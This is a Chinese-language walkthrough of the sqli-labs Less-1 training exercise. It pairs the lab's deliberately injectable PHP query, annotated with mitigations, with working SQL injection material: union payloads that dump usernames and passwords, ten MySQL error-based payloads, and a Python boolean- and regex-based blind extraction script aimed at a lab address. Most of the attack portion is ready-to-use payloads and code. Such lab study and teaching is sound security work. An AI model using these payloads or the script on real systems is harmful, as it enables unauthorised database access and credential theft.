sqlilabs


比较重要代码逻辑

// sqli-labs Less-1: the id value is read straight from the query string.
$id=$_GET['id'];
// VULNERABLE: $id is interpolated into the query without any escaping. A value
// containing a single quote closes the string literal and the rest of the value
// is parsed as SQL (the payloads below rely on exactly this). Mitigation: a
// prepared statement with a bound parameter, or — since id appears to be
// numeric on this page — casting with (int) before use. Note the mysql_*
// extension itself is removed in PHP 7 and later.
$sql="select * from users where id='$id' limit 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo $row['username'];
    // NOTE(review): key is spelled 'passowrd' here; the column enumerated later
    // on this page is 'password', so this looks like a transcription typo.
    echo $row['passowrd'];
}else{
    // The raw MySQL error text is echoed to the client; this is what the
    // error-based techniques below depend on. Production code should log the
    // error server-side and return a generic message instead.
    print_r(mysql_error());
}

从 GET 参数接收 id 的值，直接拼接进 SQL 语句并赋给变量 sql，执行后把结果赋给变量 result。由于 id 完全可控且没有任何过滤，可以闭合单引号并拼接自己的 SQL 语句，因此存在 SQL 注入。

注入判断语句

注入测试语句
' and 1=2 %23
' and 1=1 %23

联合注入



测试字段
' order by 3%23

-1' union select 1,user(),database() %23


-1' union select 1,user(),database() %23


查表
-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema="security" %23

查列名
-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name="users" %23


列名
username,password

表名
users

dump数据
-1' union select 1, group_concat(username),password from users %23

十种MySQL报错注入
报错注入
floor()

查用户
-1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

爆库

-1' and (select 1 from (select count(*),concat((SELECT schema_name from information_schema.schemata LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

爆表

-1' and (select 1 from (select count(*),concat((SELECT table_name from information_schema.`TABLES` WHERE table_schema = database() LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

爆列

-1' and (select 1 from (select count(*),concat((SELECT column_name from information_schema.`COLUMNS` WHERE table_name="users" LIMIT 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

extractvalue()

extractvalue(1,concat(0x7e,(select user()),0x7e))
-1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.`TABLES` where table_schema=database() limit 1,1),0x7e)) %23
-1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.`COLUMNS` where table_name="users" limit 1,1),0x7e)) %23

十种注入

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

布尔盲注
盲注常用函数:

length() 返回字符串的长度，可用于获取数据库名、表名、列名的长度
substr() 截取字符串。substr(string, start, length)：参数依次为字符串、起始位置、截取长度
ascii() 返回字符的 ASCII 码

database:
security

盲注脚本,判断字段长度

1' and length(database())=9%23
1' and substr(database(),s,1)="s"%23
import requests
import re
class sql_true:
    """Boolean-based blind SQL injection probe for the sqli-labs ``Less-1`` page.

    Every method concatenates a payload onto ``self.url`` (passed by the caller
    with the ``?id=`` query parameter already attached, see ``__main__``), sends
    a GET with ``requests`` and compares the ``Content-Length`` response header
    with that of a baseline request whose condition is always false. A different
    length is taken to mean "condition true". All methods print their findings
    and return ``None``.

    Detection note: each extraction method issues one request per candidate
    character for each of 25 positions with no early exit, so the server log
    shows a burst of near-identical URLs that differ only in the ``substr``
    arguments and contain ``database()`` / ``information_schema``. The same
    ``substr(database(),0,1)="*"`` baseline is reused by every method, i.e. the
    oracle assumes any false condition yields a page of identical size.
    """

    def __init__(self, url: str) -> None:
        # Base URL; payloads are appended as-is, the only encoding being the
        # literal "%23" standing in for the '#' comment marker.
        self.url = url

    def start(self) -> None:
        """Send a single exp()-based error payload and print the decoded body."""
        url = self.url + "-1' and exp(~(select * from(select database())a))%23"
        response = requests.get(url=url)
        print(response.content.decode('utf-8'))

    def lengths(self) -> None:
        """Try ``length(database())`` = 0..9 and print the value whose page size differs."""
        len_errorr = "1' and length(database())=0%23"
        # Baseline page size. Indexing the header dict raises KeyError when the
        # server omits Content-Length (e.g. chunked responses).
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        ints = 10  # exclusive upper bound on the lengths tried
        for i in range(ints):
            str_sql = f"1' and length(database())={i}%23"
            url = self.url + str_sql
            response = requests.get(url=url)
            #print(response.headers)
            lengths = response.headers['Content-Length']
            # Header values are strings, so this is a string (not numeric) comparison.
            if len1 != lengths:
                print("库字段长度:",str(i))

    def database_result(self) -> None:
        """Recover ``database()`` one character at a time and print it."""
        # Candidate alphabet: lowercase letters, digits and '|' only.
        s = 'abcdefghijklmnopqrstuvwxyz1234567890|'
        len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
        # Baseline page size for an always-false condition (KeyError if the
        # header is absent).
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        result = ''
        for lens in range(25):  # position counter, used directly as the substr offset
            for i in s:
                str_sql2 = f"1' and substr(database(),{lens},1)=\"{i}\"%23"
                url = self.url + str_sql2
                response = requests.get(url=url)
                lengths = response.headers['Content-Length']
                # Different page size => this candidate matched at this position.
                if len1 != lengths:
                    result += str(i)
                    print(str(i))
        print(result)

    def tables_result(self) -> None:
        """Same oracle as ``database_result``, applied to the first table name
        (``LIMIT 0,1``) of the current schema; prints the recovered name."""
        s = 'abcdefghijklmnopqrstuvwxyz1234567890|'
        len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
        # Baseline is the database() probe, not a table-name probe; the oracle
        # relies on both false conditions producing the same page size.
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        result = ''
        for lens in range(25):
            for i in s:
                str_sql2 = f"1' and substr((SELECT table_name from information_schema.`TABLES` WHERE table_schema = database() LIMIT 0,1),{lens},1)=\"{i}\"%23"
                url = self.url + str_sql2
                response = requests.get(url=url)
                lengths = response.headers['Content-Length']
                if len1 != lengths:
                    result += str(i)
                    print(str(i))
        print(result)

    def columns_result(self) -> None:
        """Same oracle, applied to the third column name (``LIMIT 2,1``) of the
        ``users`` table; prints the recovered name."""
        s = 'abcdefghijklmnopqrstuvwxyz1234567890|'
        len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        result = ''
        for lens in range(25):
            for i in s:
                str_sql2 = f"1' and substr((SELECT column_name from information_schema.`COLUMNS` WHERE table_name=\"users\" LIMIT 2,1),{lens},1)=\"{i}\"%23"
                url = self.url + str_sql2
                response = requests.get(url=url)
                lengths = response.headers['Content-Length']
                if len1 != lengths:
                    result += str(i)
                    print(str(i))
        print(result)

    def dump(self) -> None:
        """Same oracle, applied to the ``password`` value of the second row
        (``LIMIT 1,1``) of ``users``; prints the recovered value."""
        s = 'abcdefghijklmnopqrstuvwxyz1234567890|'
        len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        result = ''
        for lens in range(25):
            for i in s:
                str_sql2 = f"1' and substr((select password from users limit 1,1),{lens},1)=\"{i}\"%23"
                url = self.url + str_sql2
                response = requests.get(url=url)
                lengths = response.headers['Content-Length']
                if len1 != lengths:
                    result += str(i)
                    print(str(i))
        print(result)

if __name__ == "__main__":
    # Lab target (sqli-labs Less-1); each payload is appended after "?id=".
    scanner = sql_true("http://10.211.55.10/Less-1/?id=")
    # Alternative probes, left disabled:
    #scanner.database_result()
    #scanner.tables_result()
    scanner.dump()

正则表达式注入

1' and 1=(SELECT database() REGEXP '^se' LIMIT 1,1)%23
def re_sql(self) -> None:
    """Recover ``database()`` by prefix using ``REGEXP '^<prefix>'`` instead of ``substr``.

    Same Content-Length oracle as the other methods: ``len1`` is the page size
    of an always-false baseline, and a response of a different size is taken to
    mean the anchored regex matched. Each accepted character is appended to
    ``result`` and becomes part of the next prefix; since there is no early
    exit, the remaining candidates of the same pass are tested against the
    extended prefix. Prints each accepted character and finally the prefix.
    Appears to be a method of the ``sql_true`` class shown earlier (it reads
    ``self.url``).
    """
    # Candidate alphabet: lowercase letters and digits.
    s = 'abcdefghijklmnopqrstuvwxyz1234567890'
    len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
    # Baseline page size (KeyError if the Content-Length header is absent).
    len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
    sql_content = ''  # unused: only referenced by the commented-out line below
    result = ''
    for c in range(20):  # at most 20 passes; c itself is not used
        for i in s:
            # Anchored regex on the prefix recovered so far plus one candidate.
            str_sql2 = f"1' and 1=(SELECT database() REGEXP '^{result+i}' LIMIT 1,1)%23"
            url = self.url + str_sql2
            response = requests.get(url=url)
            lengths = response.headers['Content-Length']
            if len1 != lengths:
                result += i
                #sql_content += i
                print(str(i))
    print(result)